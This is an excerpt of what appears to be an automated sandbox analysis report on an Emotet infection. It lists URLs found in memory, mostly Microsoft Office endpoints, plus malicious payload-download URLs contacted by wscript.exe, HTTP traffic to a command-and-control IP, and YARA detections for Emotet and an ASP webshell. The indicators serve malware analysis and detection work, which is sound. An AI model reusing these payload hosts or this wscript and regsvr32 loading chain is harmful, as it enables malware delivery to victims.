                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://invites.office.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://lifecycle.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://login.microsoftonline.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://login.windows.local
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://make.powerautomate.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://management.azure.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://management.azure.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.action.office.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.engagement.office.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://messaging.office.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://microsoftapc-my.sharepoint.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ncus.contentsync.
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ncus.pagecontentsync.
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://officeapps.live.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://onedrive.live.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://onedrive.live.com/embed?
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://otelrules.azureedge.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://outlook.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://outlook.office.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://outlook.office365.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://outlook.office365.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://pages.store.office.com/review/query
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                      Source: wscript.exe, 0000000A.00000002.349066831.0000000005A24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.343720748.0000000005A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/
                      Source: wscript.exe, 0000000A.00000002.349109014.0000000005A3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345850174.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.343482414.0000000005A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/8.
                      Source: wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342977618.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
                      Source: wscript.exe, 0000000A.00000003.325953256.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348155400.00000000055CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329739931.00000000055CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/;1
                      Source: wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/ocal
                      Source: wscript.exe, 0000000A.00000002.347557643.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321190525.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344931402.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.318167468.00000000030A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/otn
                      Source: wscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
                      Source: wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                      Source: wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
                      Source: wscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://powerlift-user.acompli.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://powerlift.acompli.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://pushchannel.1drv.ms
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://settings.outlook.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://shell.suite.office.com:1443
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://staging.cortana.ai
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://store.office.de/addinstemplate
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://tasks.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://webshell.suite.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://wus2.contentsync.
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://wus2.pagecontentsync.
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                      Source: wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
                      Source: wscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://www.odwebp.svc.ms
                      Source: unknownHTTP traffic detected: POST /acfnurik/pjkp/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
                      Source: unknownDNS traffic detected: queries for: penshorn.org
                      Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                      Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.7:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.7:49707 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 13.2.regsvr32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.regsvr32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.2550000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.2550000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.559981390.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.560329835.0000000000921000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.315209574.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: 0000000A.00000003.343720748.0000000005A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\FtYcgioKSiXTtw\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_000000018000681812_2_0000000180006818
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_000000018000B87812_2_000000018000B878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_000000018000711012_2_0000000180007110
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180008D2812_2_0000000180008D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_000000018001455512_2_0000000180014555
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_00C7000012_2_00C70000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258263C12_2_0258263C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02588BC812_2_02588BC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02598FC812_2_02598FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258CC1412_2_0258CC14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259A00012_2_0259A000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259709C12_2_0259709C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02587D6C12_2_02587D6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258B25812_2_0258B258
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258F65C12_2_0258F65C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259A24412_2_0259A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02590A7012_2_02590A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258327412_2_02583274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258A66012_2_0258A660
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258461C12_2_0258461C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258421412_2_02584214
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02598E0812_2_02598E08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02583E0C12_2_02583E0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259020C12_2_0259020C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02595A0012_2_02595A00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A8A0012_2_025A8A00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258BA2C12_2_0258BA2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02598A2C12_2_02598A2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02590E2C12_2_02590E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259662C12_2_0259662C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025996D412_2_025996D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258D6CC12_2_0258D6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259EAC012_2_0259EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025892F012_2_025892F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258BE9012_2_0258BE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02594A9012_2_02594A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02588A8C12_2_02588A8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A4E8C12_2_025A4E8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258AAB812_2_0258AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02584EB812_2_02584EB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02583ABC12_2_02583ABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259A6BC12_2_0259A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258475812_2_02584758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258975C12_2_0258975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259E75012_2_0259E750
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258837812_2_02588378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258F77C12_2_0258F77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259D77012_2_0259D770
